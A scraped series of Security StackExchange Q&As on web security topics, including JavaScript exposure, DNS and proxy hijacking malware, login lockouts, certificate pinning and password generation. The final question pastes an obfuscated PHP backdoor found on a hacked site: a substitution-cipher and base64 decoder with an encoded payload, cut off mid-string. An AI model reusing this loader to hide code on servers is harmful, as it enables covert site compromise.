85,275 | Right now I'm developing a web application and it uses a lot of JavaScript functions so I'm putting all of them in different JS files to access from the HTML, but the functions are "easy readable" so the atacker knows what is going on with the application. My question is, Is it dangerous that the attacker knows all the JavaScript functions and all the CSS styles (effects) ? If this is true, is there a good solution for this? I know that I can minify the JavaScript but anyway this will only make the hacker angry... | To state it more directly: Is it dangerous that the attacker knows all the JavaScript functions and all the CSS styles (effects) ? No, it is not inherently dangerous for an attacker to see JS and CSS. After all, the attacker or any other client must be able to see these files in order for the application to work at all! It is your job to design your application so that an attacker who has complete access to the HTML, CSS, and Javascript code still will not be able to execute an attack (whether an attack on the server, or a "client-side" exploit like cross-site request forgery). Easier said than done, of course, but that is the goal. Actually, good security would mean designing your app so that an attacker who has complete (read-only) access to the HTML, CSS, JS, the server-side scripts, the web server's source code, and the system's configuration still could not pull off an attack. Attackers can, in general, get access to all these things. But in practice, you can take measures to hide the server-side configuration and source code, and it will slow down someone who is not sufficiently determined. You cannot hide the HTML/CSS/JS and still expect the web application to work. | {
"source": [
"https://security.stackexchange.com/questions/85275",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70868/"
]
} |
85,391 | I heard in a security talk today (I didn't have the opportunity to ask questions): The speaker mentioned that he observed (2 years ago) that a possible malware on a given computer was behaving such that, when the user visits a legitimate URL via the browser, the malware changes the URL that needs to be visited; so the URL in the address bar remains the same, but the page visited is now malicious. Can someone tell how a malware could achieve this OR is this even possible today ?
Is the malware somehow intercepting the request sent by the browser ? | There are several ways to achieve this: Malware working as a proxy or directly hooked into the browser (like with browser extensions) can change the content of the site itself, that is one will still visit the original site but the content will be changed in transit or gets changed inside the browser with script injection or similar. This kind of malware is often used to inject advertisements. By changing the DNS settings it will return attacker-controlled IP addresses for a host name instead of the real IP addresses. This way all traffic to these hosts goes to the attacker which then can provide different content. DNS settings can be changed on the computer itself or even on the router. In the later case all systems in the local network are effected. See https://nakedsecurity.sophos.com/2012/10/01/hacked-routers-brazil-vb2012/ for a detailed example. Otherwise compromised middleboxes (routers, firewalls, proxies) can also be used to change or redirect traffic. | {
"source": [
"https://security.stackexchange.com/questions/85391",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42517/"
]
} |
85,435 | I've seen the following login rate limiting approach used on a web site I worked on, but I can't figure out if it's a good idea: After any failed login attempt, the site locks the user account for a fraction of a second. When the account is locked, any login attempts will fail, even attempts with correct credentials. The user is not told that their account is locked, only that their login failed. The idea is that real users will generally take longer than the lockout time to re-enter their credentials (and will probably re-enter them more slowly the third time if they accidentally trigger the lockout). Meanwhile, hackers brute-forcing passwords would trip the lockout with high-volume login attempts. What are the problems with this approach? | There's a growing number of what I am calling "slow brute force attacks". Where a bot net with a listing of targets makes a low number of attempts at regular intervals to each target in effort to not get caught by the usual methods of monitoring fast attacks. I manage a number of websites and I typically see failed login attempts ranging from 3 to 10 attempts on multiple unrelated sites with the exact same user names and password combinations. Typically it is an alphabetical list, but not always. The attempts will usually happen once a day for any number of days. The sophistication of these hacking attempts is very low, but they would likely be able to bypass a brief lockout as you describe. Any user with a weak password can/will eventually be compromised, and the attack is designed to stay below the radar. Your method might be very useful for a specific type/speed of fast attack, but it should be just one of many tools if you choose to use it at all. | {
"source": [
"https://security.stackexchange.com/questions/85435",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21359/"
]
} |
85,683 | Passwords with a mixture of letters, numbers, and special characters are sometimes hard to remember. Is it secure to instead use a small amount of memorable source code as a 'passphrase'? As an example, take a simple for loop in Go: fori:=1;i<5;i++{fmt.Println(i)} Normal people would only see the cryptic syntax, but as a person with a programming background, this may be more easy to memorize. Would it be at least as secure as a normal password? | You can use source code as password. However I'd strongly recommend against using source code as a passphrase. The reason for this is entropy. Passwords / passwphrases need to provide lots of entropy (100 bits+) and programming languages usually pose severe constraints on the formulation of instruction thus resulting in less entropy per character than even with a standard passphrase. What may be possible aside of that, you can use source code files (100 lines+) with lots of complex instructions and non machine-codable as keyfile. | {
"source": [
"https://security.stackexchange.com/questions/85683",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55169/"
]
} |
85,813 | I checked out the app Packet Capture . This app is able to decrypt my app APIs (SSL Enabled) data by mounting a MITM attack using the Android VPN service. This does not even require root. How can I prevent it? We want to transmit secure data through our servers to Android devices. | That app (and all MITM proxy apps such as SandroProxy and mitmproxy) work by installing their own trusted CA certificate on the device. That allows them to sign their own certificates which the device will accept. You have to manually install their certificate to the user key-store using a dialogue such as this: After which it displays warnings such as this: It's unlikely (albeit not completely impossible) that a user would do this unintentionally, so overall it's a reasonably low threat. Having said that, if you want to protect your App even if someone has installed a malicious CA certificate then you should implement certificate pinning . If the device is rooted then it is conceivable that an attacker could install a malicious certificate, conceal it, and modify your Apps to compromise validation and prevent pinning. However, if something rogue has root access then essentially your entire device is compromised any way. | {
"source": [
"https://security.stackexchange.com/questions/85813",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/770/"
]
} |
85,934 | Almost every web service I can imagine has the user pick the password. Why is this? Couldn't the system choose a better password? It doesn't have to be some complicated mess; see this answer . Do users just find their own choices more convenient? When selecting the password for the user, you know the entropy, as opposed to placing some restrictions that may prevent them from using a low entropy scheme. Why do we let the user pick the password? | Why, indeed? Allow me to ignore that question for a moment, and answer your implied question: Should we? That is, should we continue to have users create their own password, which is often weak, instead of just having the system generate a strong password for them? Well, I am of the controversial opinion that there is a pretty strong trade-off here - having a secure password, and KNOWING how secure it is (as you point out), on the one hand, and on the other side is the user's feeling of security. "Usability", to some extent. I think there are several aspects to this feeling of security: some users would want to ensure that they have a strong password themselves (e.g. via a password manager, or diceware); some users would want to select an easy password; and some users want to use the same password everywhere. And yes, many users just plain expect to be able to set their password, for whatever reason - so besides any specific cause, you will still need to fight the re-education battle, which is far from easy. Also, don't forget that once you get a good strong password to the user, the (often non-technical) user still needs to figure out what to do with it - even passphrases become difficult to remember after the first dozen or so, or if you only use it every 6 months... The non-technical user would most likely save it in a word document on their desktop, or in their email. (And of course write the OS password on a sticky note attached to the screen). Now, don't belittle these reasons, or these causes for using weak passwords - we the security industry have created this scenario for the simple folk over years. But it really comes down to: how secure do you need your site to be. How much risk can the user decide to take upon himself/herself, and how much of that is system risk that should be taken out of the user's hands. So bottom line: Yes, I think most sites that have non-negligible security requirements should offer password/passphrase generation. Depending on the profile and architecture, you could offer 3 options when registering an account (or changing password, etc...) - just make sure to only display the password after warning the user against shoulder-surfing: Generate passphrase - with a configured or flexible number of words (default) Generate crazy-strong password with ridiculous entropy, e.g. for saving to password manager Create your own. In fact this is what I've been recommending for some time now (variants dependent on the specific requirements...). Going back to your original question, why is the above not done? I would guess a combination of legacy systems and bad habits; mis-education (the overwhelming majority of sites still have BAD password policies and recommendations); and perhaps just a lack of awareness of a better solution. Yes, this is why passwords suck . :-) | {
"source": [
"https://security.stackexchange.com/questions/85934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56579/"
]
} |
85,963 | I read in the OWASP cheat sheet regarding certificate / public-key pinning that “Google rotates its certificates … about once a month … [but] the underlying public keys … remain static”. Increasing the frequency of key rotation makes sense to me in that, should a key be compromised without detection, the time frame for ongoing damages is reduced. What is the benefit of rotating certificates so frequently? Is it to allow them to use SHA1 (for old-browser compatibility) whilst limiting an adversary's scope for finding a matching signature? Or is there something else that I'm missing? | One big advantage is removing the need for revocation in the event of a compromise. The "typical" way to do this is publishing a certificate revocation list (CRL) or using the OSCP protocol in the event of a compromise to revoke certificates. However, the CRL or OSCP check is incredibly easy to bypass. An attacker in a position to perform a MITM attack can simply block a client from communicating with the server where the CRL is hosted and the client will simply happily go about its business. This is necessary because of common situations like captive portals that work over HTTPS yet blocks all other traffic, including traffic to CRL servers. Short lived certificates have the advantage that in the event of a compromise, the compromised certificate will only work for a very limited period of time until the certificate expires, therefore limiting the damage that can be caused. Adam Langley has written extensively on the subject if further readings is required. | {
"source": [
"https://security.stackexchange.com/questions/85963",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72398/"
]
} |
86,094 | Somebody hacked my site and uploaded this script ( template46.php ) to my webroot and its content is: <?php
$vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
return base64_decode($vM74216);}
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
'7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
'7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
'7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
'1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
'7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
'2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
'10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
'9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
'4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
'497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
'92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
'03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
'3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
'4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
'9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
'1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
'2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
'7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
'852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
'3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
'4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
'2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
